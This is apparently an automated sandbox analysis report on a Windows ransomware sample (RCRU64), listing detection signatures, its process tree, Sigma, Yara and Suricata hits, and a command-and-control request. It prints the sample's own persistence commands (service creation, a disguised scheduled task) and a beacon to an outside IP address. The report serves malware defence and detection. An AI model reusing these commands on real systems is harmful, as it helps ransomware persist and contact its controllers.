Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8AbMCL2dxM.exe

Overview

General Information

Sample name:8AbMCL2dxM.exe
renamed because original name is a hash value
Original sample name:2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d.exe
Analysis ID:1569976
MD5:f383db0b947e0bce25a542dd7fc11139
SHA1:2ae37fda200d51610fbe6cad6dde08bbbb802a0a
SHA256:2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

RCRU64, TrojanRansom
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RCRU64 Ransomware
Yara detected TrojanRansom
AI detected suspicious sample
Contains functionality to clear event logs
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 8AbMCL2dxM.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\8AbMCL2dxM.exe" MD5: F383DB0B947E0BCE25A542DD7FC11139)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2884 cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • tasklist.exe (PID: 6220 cmdline: tasklist /v /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6808 cmdline: findstr /i "dcdcf" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 2168 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 524 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 5056 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 4876 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 5280 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 5368 cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 5476 cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wscript.exe (PID: 6276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 3300 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 528 cmdline: tasklist /v MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 3500 cmdline: find /I /c "dcdcf" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2912 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6896 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 6272 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2996 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6136 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5292 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2364 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 948 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 3500 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 1012 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 5512 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 1176 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 5984 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2912 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 1052 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 3640 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6200 cmdline: tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 4020 cmdline: find /I "8AbMCL2dxM.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 5388 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • schtasks.exe (PID: 5588 cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 1052 cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 5032 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
        • WmiPrvSE.exe (PID: 516 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
      • find.exe (PID: 876 cmdline: find /i "os name" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1464 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 2168 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 6940 cmdline: find /i "original" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 6292 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cmd.exe (PID: 2884 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 5476 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 6896 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5716 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5032 cmdline: tasklist /v MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 4152 cmdline: find /I /c "dcdcf" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • Xinfecter.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" MD5: F383DB0B947E0BCE25A542DD7FC11139)
    • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: 8AbMCL2dxM.exe PID: 7152JoeSecurity_rcru64Yara detected RCRU64 RansomwareJoe Security
    Process Memory Space: 8AbMCL2dxM.exe PID: 7152JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security
      Process Memory Space: Xinfecter.exe PID: 3164JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
        Source: Threat createdAuthor: @SBousseaden (detection), Thomas Patzke (rule): Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 5476, StartAddress: 89DBBCC0, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 5476
        Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
        Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 5476, StartAddress: 89DBBCC0, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 5476
        Sigma detected: Suspicious File Creation In Uncommon AppData Folder
        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\8AbMCL2dxM.exe, ProcessId: 7152, TargetFilename: C:\Users\user\AppData\S-6748.bat
        Sigma detected: Suspicious New Service Creation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2168, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 524, ProcessName: sc.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5476, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 6276, ProcessName: wscript.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\8AbMCL2dxM.exe, ProcessId: 7152, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5476, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 6276, ProcessName: wscript.exe
        Sigma detected: New Service Creation Using Sc.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2168, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 524, ProcessName: sc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-06T13:39:10.708832+010020458211Malware Command and Control Activity Detected192.168.2.649742185.147.34.533586TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: 8AbMCL2dxM.exeAvira: detected
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeAvira: detection malicious, Label: HEUR/AGEN.1353205
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeReversingLabs: Detection: 76%
        Multi AV Scanner detection for submitted file
        Source: 8AbMCL2dxM.exeReversingLabs: Detection: 76%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: 8AbMCL2dxM.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00914A30 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,1_2_00914A30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00914FF0 CryptReleaseContext,1_2_00914FF0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00915100 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,1_2_00915100
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00914B90 CryptAcquireContextA,GetLastError,CryptReleaseContext,1_2_00914B90
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00914F20 CryptReleaseContext,1_2_00914F20
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00914F60 CryptGenRandom,__CxxThrowException@8,1_2_00914F60
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00274A30 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,42_2_00274A30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00274FF0 CryptReleaseContext,42_2_00274FF0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00275100 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,42_2_00275100
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00274B90 CryptAcquireContextA,GetLastError,CryptReleaseContext,42_2_00274B90
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00274F20 CryptReleaseContext,42_2_00274F20
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00274F60 CryptGenRandom,__CxxThrowException@8,42_2_00274F60
        Source: 8AbMCL2dxM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 8AbMCL2dxM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: e:Jump to behavior
        Source: C:\Windows\System32\cmd.exeFile opened: c:
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C4CC0 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,1_2_008C4CC0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00224CC0 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,42_2_00224CC0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CA2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,1_2_008CA2AA
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0097C26B FindFirstFileExA,1_2_0097C26B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C8A30 SetErrorMode,FindFirstFileW,1_2_008C8A30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C8B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,1_2_008C8B70
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CB740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,1_2_008CB740
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002DC26B FindFirstFileExA,42_2_002DC26B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022A2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,42_2_0022A2AA
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00228A30 SetErrorMode,FindFirstFileW,42_2_00228A30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00228B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,42_2_00228B70
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022B740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,42_2_0022B740
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CE140 GetLogicalDriveStringsA,1_2_008CE140

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2045821 - Severity 1 - ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity : 192.168.2.6:49742 -> 185.147.34.53:3586
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 3586
        Source: global trafficTCP traffic: 192.168.2.6:49742 -> 185.147.34.53:3586
        Source: global trafficHTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:39:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8aI4Dmwj4IAGsj1kBSGMcYydlQMVc9w0JoZmoaumhEXx06wC+fRSdEFpm5V6oWMp3tLPriQk05mszsyPy92zYenvnwEOpE5Cu5ynerWWnZRuY9JoBD7XQlmkj3dwcDaoB47TXLfKI9BVaKCyncaMp6B+5hpDTp/Voi1+nc81kqofSdhx+EmMJCDlQwjNLFyzVc6cN65bHpqoaELtCxFI079gXBCFsVljPKykMPlOE3C25nMWauaceeMu3QU7npybPaQYsB6QbzSUgY7T7z6JERI/gqMedNN4IYFtVQO/k2DgXYnXNHAnDRK9Z9LGqeYeHaeHuHllFjnHKE1DgIm6bZBGywl5BQ42uizHVtOKzNx+crjNEfSqeRAZ/AoyLX8dp9ntkCgWu/DNPGqfoTreXwIvnXcjuDzUrmajt76h+VO6YItix4AnTzd01lB2qCSH03T5gm67zlpLj0FhRUiTvrqP2NqDoiew5Ae6uW1wsBplqTyjoqe//Fub/uYviJB+iMJ7x236hVo/mhbRTTaxhRSNAyFzkbSOkxQDaFjT/Hs+La5BMaXZ714KdOWoxkMtmO7S03fKLsJKCsMVLWcGlGGGsmb9vjTXoD+pAgERAoIBABQkrJjcwevdSBz391Xp85+qa5GWs9LwVnB3O/sRSKBwDEtx7ssEXiFi5rYJBymqawBH99Z8EF0P+xZ+/TjFKhqrUeqajT7zLOzzdue2Mvp7DWTigZTYs7Z1QqbUM5I+FdGEmId4/Eu+u8tbJMm8CIn+jHUrSRFyEDHG67RBbFUzbWR60rQ5hQWwWO5nsOF/MoSImnAlisIiGYXZ3oCbEikPfqWPirXSM/nlmi